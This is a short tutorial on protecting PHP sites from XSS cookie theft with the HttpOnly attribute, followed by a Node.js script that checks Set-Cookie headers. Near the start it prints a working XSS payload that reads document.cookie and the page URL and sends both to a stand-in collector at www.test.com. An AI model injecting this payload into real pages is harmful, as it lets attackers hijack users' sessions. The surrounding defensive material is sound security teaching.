Needless to say, XSS is extremely harmful: once an XSS vulnerability appears on your website, arbitrary JS code can be executed. The most terrifying thing is that attackers use JS to obtain cookies, or to hijack the session; if the cookie contains a lot of sensitive information (identity information, administrator information, etc.), it's over.
The following JS is used to obtain cookie information. The code is as follows:
// current page URL
var url = document.location.href;
// every cookie that script on this page is allowed to read
var cookie = document.cookie;
// both values leave the page as the query string of an image request
var c = new Image();
c.src = 'http://www.test.com/c.php?c=' + cookie + '&u=' + url;
Generally, cookies are read from the document object (document.cookie). Browsers now accept an attribute called HttpOnly when a cookie is set, just like other attributes such as domain. Once HttpOnly is set on a cookie, that cookie is no longer visible in the browser's document object, so script cannot read it.
PHP settings for HttpOnly. The code is as follows:
// In php.ini, session.cookie_httponly = true enables the HttpOnly attribute on the session cookie globally; the same setting made from code:
ini_set("session.cookie_httponly", 1);
// or set the fifth parameter of session_set_cookie_params() (likewise the seventh parameter of setcookie()) to true:
session_set_cookie_params(0, null, null, null, true);
For PHP versions prior to PHP 5.1, send the attribute in the header yourself. The code is as follows:
// the HttpOnly attribute is appended to the Set-Cookie header by hand
header("Set-Cookie: hidden=value; httpOnly");
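One way to confirm that the setting actually took effect is to look at the Set-Cookie headers the server sends back. The following Node.js script is an added example, not code from the original article: it parses Set-Cookie header lines (here constructed sample headers, not captured from any real server) and lists the cookies that script could still read via document.cookie. Attribute names are matched case-insensitively, since browsers treat "httpOnly" (as in the header() call above) and "HttpOnly" the same.

```javascript
// Added example: audit Set-Cookie headers for the HttpOnly attribute.
// The header lines below are constructed for illustration only.

function parseSetCookie(line) {
  // "name=value; Attr1; Attr2=val" -> { name, attributes: { attr1: true, attr2: 'val' } }
  const parts = line.split(';').map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrs] = parts;
  const eq = nameValue.indexOf('=');
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq);
  const attributes = {};
  for (const attr of attrs) {
    const i = attr.indexOf('=');
    // attribute names are case-insensitive, so normalise them
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, attributes };
}

// Names of cookies set without HttpOnly, i.e. the ones document.cookie exposes.
function cookiesReadableByScript(setCookieLines) {
  return setCookieLines
    .map(parseSetCookie)
    .filter((c) => !('httponly' in c.attributes))
    .map((c) => c.name);
}

// Constructed sample response headers (not from any real site).
const sampleHeaders = [
  'PHPSESSID=abc123; path=/',             // session cookie without HttpOnly
  'hidden=value; httpOnly',               // the article's header() example
  'prefs=dark; Path=/; Secure; HttpOnly', // fully flagged cookie
];

const readable = cookiesReadableByScript(sampleHeaders);
console.log('cookies readable by script:', readable); // [ 'PHPSESSID' ]
```

Run it against the real Set-Cookie lines of a login response (for example copied from the browser's network panel) and an empty list means every cookie carries HttpOnly; the session cookie showing up in the list means the php.ini or session_set_cookie_params() change did not apply.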
Finally, HttpOnly is not a panacea! It keeps the cookie out of document.cookie, but the XSS vulnerability itself still lets an attacker run arbitrary JS on the page.